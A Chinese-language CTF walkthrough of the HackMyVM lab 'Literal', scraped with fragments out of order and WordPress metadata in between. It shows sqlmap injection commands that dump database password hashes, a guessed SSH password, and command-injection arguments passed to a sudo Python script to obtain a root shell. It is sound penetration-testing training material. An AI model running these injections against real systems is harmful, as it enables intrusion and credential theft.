times<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u5ef6\u65f6\u6ce8\u5165\u6f0f\u6d1e\uff0c\u770b\u6765\u8fd9\u4e2a\u9776\u673a\u662f\u8bad\u7ec3sql\u6ce8\u5165\u7684\uff0c\u53ef\u60dc\u4e86\uff0c\u56de\u5934\u8865\u56de\u6765\u5427\u3002\u3002\u3002\u592a\u6162\u4e86\uff0c\u7ecf\u8fc7\u6f2b\u957f\u7684\u6d4b\u8bd5\u62ff\u5230\u4e86\u4e00\u4e2a\u51ed\u8bc1\uff1a<\/p>\n
# sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch --dbs\n# information_schema\n# performance_schema\n# forumtesting\n\n# sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch -D forumtesting --tables\n# forum_category\n# forum_owner\n# forum_posts\n# forum_topics\n# forum_users\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch -D forumtesting -T forum_owner --dump\n ___\n __H__\n ___ ___["]_____ ___ ___ {1.9.2#stable}\n|_ -| . [(] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 13:24:22 \/2025-06-08\/\n\n[13:24:22] [INFO] resuming back-end DBMS 'mysql' \n[13:24:22] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=cldac0c27tr...9f43f8ihi7'). Do you want to use those [Y\/n] Y\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: category_id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)\n---\n[13:24:22] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)\nweb application technology: Apache 2.4.41, PHP\nback-end DBMS: MySQL >= 5.0.12\n[13:24:22] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'\n[13:24:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done) \ndo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y\/n] Y\n[13:24:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \n5\n[13:24:43] [INFO] retrieved: \n[13:24:53] [INFO] adjusting time delay to 1 second due to good response times\ncreated\n[13:25:27] [INFO] retrieved: email\n[13:25:53] [INFO] retrieved: id\n[13:26:06] [INFO] retrieved: password\n[13:27:00] [INFO] retrieved: username\n[13:27:45] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'\n[13:27:45] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'\n[13:27:45] [INFO] retrieved: 1\n[13:27:47] [WARNING] reflective value(s) found and filtering out of statistical model, please wait \n.............................. (done)\n2022-02-12\n[13:28:46] [INFO] retrieved: carlos@forumtesting.literal.htb\n[13:32:11] [INFO] retrieved: 1\n[13:32:16] [INFO] retrieved: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99\n[13:46:13] [INFO] retrieved: carlos\n[13:46:49] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y\/N] N\ndo you want to crack them via a dictionary-based attack? [Y\/n\/q] Y\n[13:46:49] [INFO] using hash method 'sha512_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file '\/usr\/share\/sqlmap\/data\/txt\/wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> 1\n[13:46:49] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y\/N] N\n[13:46:49] [INFO] starting dictionary-based cracking (sha512_generic_passwd)\n[13:46:49] [INFO] starting 2 processes \n[13:47:11] [WARNING] no clear password(s) found \nDatabase: forumtesting\nTable: forum_owner\n[1 entry]\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n| id | email | created | password | username |\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n| 1 | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos |\n+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+\n\n[13:47:11] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '\/home\/kali\/.local\/share\/sqlmap\/output\/forumtesting.literal.hmv\/dump\/forumtesting\/forum_owner.csv'\n[13:47:11] [INFO] fetched data logged to text files under '\/home\/kali\/.local\/share\/sqlmap\/output\/forumtesting.literal.hmv'\n\n[*] ending @ 13:47:11 \/2025-06-08\/<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
<\/div><\/p>\ncarlos:forum100889<\/code><\/pre>\n\u4f46\u662f\u767b\u5f55\u5931\u8d25\u4e86\uff0c\u8fd9\u91cc\u4f5c\u8005\u610f\u601d\u662f\u521a\u521a\u7b2c\u4e8c\u4e2asql\u6ce8\u5165\u754c\u9762\u662f\u4e00\u4e2a\u8bba\u575b\uff0c\u8bba\u575b\u540d\u5b57\u4e3aforumtesting<\/code>\uff0c\u793e\u4f1a\u5de5\u7a0b\u5b66\u6765\u770b\u4ed6\u5bc6\u7801\u53d6\u4e3aforum100889<\/code>\u662f\u56e0\u4e3a\u5bf9\u5e94\u7740\u5e73\u53f0\u524d\u4e94\u4f4d\u4ee5\u53ca\u6570\u5b57\uff0c\u6240\u4ee5\u4ed6\u7684ssh\u5bc6\u7801\u53ef\u80fd\u4e3assh100889<\/code>\uff0c\u786e\u5b9e\u9700\u8981\u4e00\u70b9\u8111\u6d1e\u7684\u3002\u3002\u3002\u3002<\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ncarlos@literal:~$ whoami;id\ncarlos\nuid=1000(carlos) gid=1000(carlos) groups=1000(carlos)\ncarlos@literal:~$ ls -la\ntotal 44\ndrwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 .\ndrwxr-xr-x 3 root root 4096 Jun 15 2022 ..\nlrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 carlos carlos 220 Feb 25 2020 .bash_logout\n-rw-r--r-- 1 carlos carlos 3771 Feb 25 2020 .bashrc\ndrwx------ 2 carlos carlos 4096 Jun 21 2022 .cache\ndrwx------ 3 carlos carlos 4096 Jun 22 2022 .gnupg\ndrwxrwxr-x 3 carlos carlos 4096 Feb 12 2021 .local\ndrwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 my_things\n-rw-r--r-- 1 carlos carlos 807 Feb 25 2020 .profile\ndrwx------ 2 carlos carlos 4096 Sep 20 2021 .ssh\n-rw-r----- 1 root carlos 33 Feb 13 2021 user.txt\ncarlos@literal:~$ cd my_things\/\ncarlos@literal:~\/my_things$ ls -la\ntotal 12\ndrwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 .\ndrwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 ..\n-rw-rw-r-- 1 carlos carlos 226 Jun 8 17:36 detalles.txt\ncarlos@literal:~\/my_things$ cat detalles.txt \nTo check one day.\n\nBlog ----:\n> Blog colors.\n> Validate syntax and coherence.\n> Buttom to translate blog to Spanish.\n> Check task on both blog and forum.\n\nForum ---:\n> Delete default posts.\n> Create custom responses to mails.\ncarlos@literal:~\/my_things$ crontab -l\nno crontab for carlos\ncarlos@literal:~\/my_things$ cd ..\ncarlos@literal:~$ cat user.txt \n6d3c8a6c73cf4f89eea7ae57f6eb9222\ncarlos@literal:~$ sudo -l\nMatching Defaults entries for carlos on literal:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser carlos may run the following commands on literal:\n (root) NOPASSWD: \/opt\/my_things\/blog\/update_project_status.py *<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n
#!\/usr\/bin\/python3\n\n# Learning python3 to update my project status\n## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P\n\n'''\nReferences:\n* MySQL commands in Linux: https:\/\/www.shellhacks.com\/mysql-run-query-bash-script-linux-command-line\/\n* Shell commands in Python: https:\/\/stackabuse.com\/executing-shell-commands-with-python\/\n* Functions: https:\/\/www.tutorialspoint.com\/python3\/python_functions.htm\n* Arguments: https:\/\/www.knowledgehut.com\/blog\/programming\/sys-argv-python-examples\n* Array validation: https:\/\/stackoverflow.com\/questions\/7571635\/fastest-way-to-check-if-a-value-exists-in-a-list\n* Valid if root is running the script: https:\/\/stackoverflow.com\/questions\/2806897\/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg\n'''\n\nimport os\nimport sys\nfrom datetime import date\n\n# Functions ------------------------------------------------.\ndef execute_query(sql):\n os.system("mysql -u " + db_user + " -D " + db_name + " -e \\"" + sql + "\\"")\n\n# Query all rows\ndef query_all():\n sql = "SELECT * FROM projects;"\n execute_query(sql)\n\n# Query row by ID\ndef query_by_id(arg_project_id):\n sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"\n execute_query(sql)\n\n# Update database\ndef update_status(enddate, arg_project_id, arg_project_status):\n if enddate != 0:\n sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"\n else:\n sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"\n\n execute_query(sql)\n\n# Main program\ndef main():\n # Fast validation\n try:\n arg_project_id = sys.argv[1]\n except:\n arg_project_id = ""\n\n try:\n arg_project_status = sys.argv[2]\n except:\n arg_project_status = ""\n\n if arg_project_id and arg_project_status: # To update\n # Avoid update by error\n if os.geteuid() == 0:\n array_status = ["Done", "Doing", "To do"]\n if arg_project_status in array_status:\n print("[+] Before update project (" + arg_project_id + ")\\n")\n query_by_id(arg_project_id)\n\n if arg_project_status == 'Done':\n update_status(date.today(), arg_project_id, arg_project_status)\n else:\n update_status(0, arg_project_id, arg_project_status)\n else:\n print("Bro, avoid a fail: Done - Doing - To do")\n exit(1)\n\n print("\\n[+] New status of project (" + arg_project_id + ")\\n")\n query_by_id(arg_project_id)\n else:\n print("Ejejeeey, avoid mistakes!")\n exit(1)\n\n elif arg_project_id:\n query_by_id(arg_project_id)\n else:\n query_all()\n\n# Variables ------------------------------------------------.\ndb_user = "carlos"\ndb_name = "blog"\n\n# Main program\nmain()<\/code><\/pre>\n\u6ce8\u610f\u5230execute_query<\/code>\u76f4\u63a5\u6267\u884c\u62fc\u63a5\u8d77\u6765\u7684\u547d\u4ee4\uff0c\u5c1d\u8bd5\u95ed\u5408sql\u8bed\u53e5\u62fc\u63a5\u8fdb\u53bb\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |\n| 2 | Ascii Art Python - Show logos only with letter A | 2021-09-20 18:06:22 | 2222-12-12 | To do |\n| 3 | Ascii Art Bash - Show musical stores (WTF) | 2021-09-20 18:06:50 | 2222-12-12 | To do |\n| 4 | Forum - Add that people can send me bug reports of projects | 2023-04-07 17:40:41 | 2023-11-01 | Doing |\n| 5 | Validate syntax errors on blog pages | 2021-09-20 18:07:43 | 2222-12-12 | Doing |\n| 6 | Script to extract info from files and upload it to any DB | 2021-09-20 18:07:58 | 2222-12-12 | Doing |\n| 7 | Forum - Implement forum form | 2023-04-07 17:46:38 | 2023-11-01 | Doing |\n| 8 | Add that people can create their own projects on DB | 2021-09-20 18:49:52 | 2222-12-12 | To do |\n| 9 | Ascii Art C - Start learning Ascii Art with C | 2021-09-20 18:50:02 | 2222-12-12 | To do |\n| 10 | Ascii Art Bash - Welcome banner preview in blog home | 2021-09-20 18:50:08 | 2222-12-12 | To do |\n| 11 | Blog - Create login and register form | 2023-04-07 17:40:28 | 2023-08-21 | Done |\n| 12 | Blog - Improve the appearance of the dashboard\/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py 1\n+-------+-----------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+-----------------------------------------+---------------------+------------+-----------+\n| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |\n+-------+-----------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py 12\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| 12 | Blog - Improve the appearance of the dashboard\/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py '";whoami;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\ncarlos\nuid=1000(carlos) gid=1000(carlos) groups=1000(carlos)\nsh: 1: ;: not found\ncarlos@literal:~$ sudo \/opt\/my_things\/blog\/update_project_status.py '";whoami;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\nroot\nuid=0(root) gid=0(root) groups=0(root)\nsh: 1: ;: not found<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5sudo\u5373\u53ef\u83b7\u53d6rootshell\uff01<\/p>\n
<\/div><\/p>\ncarlos@literal:~$ sudo \/opt\/my_things\/blog\/update_project_status.py '";bash;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\nroot@literal:\/home\/carlos# cd ~\nroot@literal:~# ls -la\ntotal 36\ndrwx------ 5 root root 4096 Jun 8 15:20 .\ndrwxr-xr-x 20 root root 4096 Feb 7 2021 ..\nlrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc\ndrwxr-xr-x 3 root root 4096 Sep 18 2021 .cache\ndrwxr-xr-x 3 root root 4096 Feb 12 2021 .local\ndrwxr-xr-x 3 root root 4096 Jun 17 2022 my_things\n-rw-r--r-- 1 root root 161 Dec 5 2019 .profile\n-rw------- 1 root root 33 Feb 13 2021 root.txt\n-rw-r--r-- 1 root root 74 Sep 20 2021 .selected_editor\nroot@literal:~# cat root.txt\nca43cb966ef76475d9e0736feeb9f730<\/code><\/pre>\n\u8fd8\u770b\u5230\u6709\u4e00\u79cd\u89e3\u6cd5\u4e3a\uff1a<\/p>\n
sudo \/opt\/my_things\/blog\/update_project_status.py '\\! \/bin\/bash' Done<\/code><\/pre>\n\u4e5f\u633a\u597d\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Literal \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal] \u2514\u2500$ r […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-843","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=843"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843\/revisions"}],"predecessor-version":[{"id":844,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843\/revisions\/844"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=843"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.107:22\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHo8DOQOkmGeRiMEbdmfaE+IyUTZlYHdLzXeFISi7bsWEPHm2f3Lx9RpCBM4g05tmpBBe4sPyruVbuslcGcCmlUzBYupaHJQRVi79Dezh9CKf4Ui1EC6y4jh9TbvHPvM7hPhSBhADnCuEpWlVHeyUs4Wwzt6149l4ZFYXnl1\/jfG\/LA\/PNRX26fhZUEJJXuvhwJIbchRxXhF00mREtmx5hbyDAXOIImUReCSjEhUAR3I4eljBgNEf\/SoBvntnricNXGb8y2M1WoidBz3lLRRPhpQy0GE2BVs\/05EirzRAIVWhLj7OiKIoLRd\/tKq\/CvSy5AYPyaC55cwktS60KIMzUBldGK65btKjNabs9rgNE\/azTmpmEiWuHZKCdW4IhA00hXywbr6lWuSNmEaPnQqBLT0VUKFHEyhApBmvcT5GjHS34lG88xGAy7V1TVW8JKPHDq1ttnnJknRn9C9BmgylrwyL7m8UjCn49unSIbIFtkaSshPhpZfLzxxXKS6xrBes=\n| 256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNvQ4n2nkgCsY7Z8qPbOt54NyXbow2ioVHPFXTn6XuwDOJpc5Q0FhEmSTVC4o4l9G+FMDzkJ2JgghkHvNstXiXU=\n| 256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKUnTxK9t2cdkLjqE75NTSfr7qidWHqt0\/uV3i0UALED\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.41\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/blog.literal.hmv\nMAC Address: 08:00:27:4C:64:E1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u6dfb\u52a0\u5230\/etc\/hosts<\/code>\uff1a<\/p>\n192.168.10.107 blog.literal.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ gobuster dir -u http:\/\/blog.literal.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip -e 200,302,301 -t 20 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/blog.literal.hmv\/\n[+] Method: GET\n[+] Threads: 20\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: txt,html,zip,php\n[+] Expanded: true\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/blog.literal.hmv\/.html (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/.php (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/images (Status: 301) [Size: 321] [--> http:\/\/blog.literal.hmv\/images\/]\nhttp:\/\/blog.literal.hmv\/index.html (Status: 200) [Size: 3325]\nhttp:\/\/blog.literal.hmv\/login.php (Status: 200) [Size: 1893]\nhttp:\/\/blog.literal.hmv\/register.php (Status: 200) [Size: 2159]\nhttp:\/\/blog.literal.hmv\/logout.php (Status: 302) [Size: 0] [--> login.php]\nhttp:\/\/blog.literal.hmv\/config.php (Status: 200) [Size: 0]\nhttp:\/\/blog.literal.hmv\/fonts (Status: 301) [Size: 320] [--> http:\/\/blog.literal.hmv\/fonts\/]\nhttp:\/\/blog.literal.hmv\/dashboard.php (Status: 302) [Size: 0] [--> login.php]\nhttp:\/\/blog.literal.hmv\/.html (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/.php (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/server-status (Status: 403) [Size: 281]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u5c1d\u8bd5login.php<\/code>\u4ee5\u53caregister.php<\/code>\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u7528\u6237\u5e76\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u767b\u5f55\u4ee5\u540e\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nsql\u6ce8\u5165<\/h3>\n
\u770b\u8d77\u6765\u662f\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u5c1d\u8bd5\u662f\u5426\u5b58\u5728SQL\u6ce8\u5165<\/code>\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\u8bbf\u95ee\u901f\u9012\u6781\u6162\u4e14\u5361\u987f\uff0c\u5c1d\u8bd5\u547d\u4ee4\u884c\u8fdb\u884c\u67e5\u8be2\uff1a<\/p>\nPHPSESSID=1q4tie68cpa1mue9af2ao65549<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884csqlmap<\/code>\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs\n ___\n __H__\n ___ ___[.]_____ ___ ___ {1.9.2#stable}\n|_ -| . [,] | .'| . |\n|___|_ [)]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:04:49 \/2025-06-08\/\n\n[12:04:49] [INFO] resuming back-end DBMS 'mysql' \n[12:04:49] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: sentence-query (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 5 columns\n Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -\n---\n[12:04:49] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)\nweb application technology: Apache 2.4.41\nback-end DBMS: MySQL >= 5.0.12\n[12:04:49] [INFO] fetching database names\navailable databases [4]:\n[*] blog\n[*] information_schema\n[*] mysql\n[*] performance_schema\n\n[12:04:50] [INFO] fetched data logged to text files under '\/home\/kali\/.local\/share\/sqlmap\/output\/blog.literal.hmv'\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables\n-----\nDatabase: blog\n[2 tables]\n+----------+\n| projects |\n| users |\n+----------+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump\n\nDatabase: blog\nTable: users\n[18 entries]\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+\n| userid | username | useremail | userpassword | usercreatedate |\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+\n| 1 | test | test@blog.literal.htb | $2y$10$wWhvCz1pGsKm..jh\/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |\n| 2 | admin | admin@blog.literal.htb | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |\n| 3 | carlos | carlos@blog.literal.htb | $2y$10$ikI1dN\/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD\/.p.bh0w.bJBW | 2023-04-07 17:21:48 |\n| 4 | freddy123 | freddy123@zeeli.moc | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |\n| 5 | jorg3_M | jorg3_M@zeeli.moc | $2y$10$lZ.\/Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |\n| 6 | aNdr3s1to | aNdr3s1to@puertonacional.ply | $2y$10$F2Eh43xkXR\/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi\/OBA6hm | 2023-04-07 17:21:48 |\n| 7 | kitty | kitty@estadodelarte.moc | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |\n| 8 | walter | walter@forumtesting.literal.hmv | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |\n| 9 | estefy | estefy@caselogic.moc | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |\n| 10 | michael | michael@without.you | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |\n| 11 | r1ch4rd | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |\n| 12 | fel1x | fel1x@without.you | 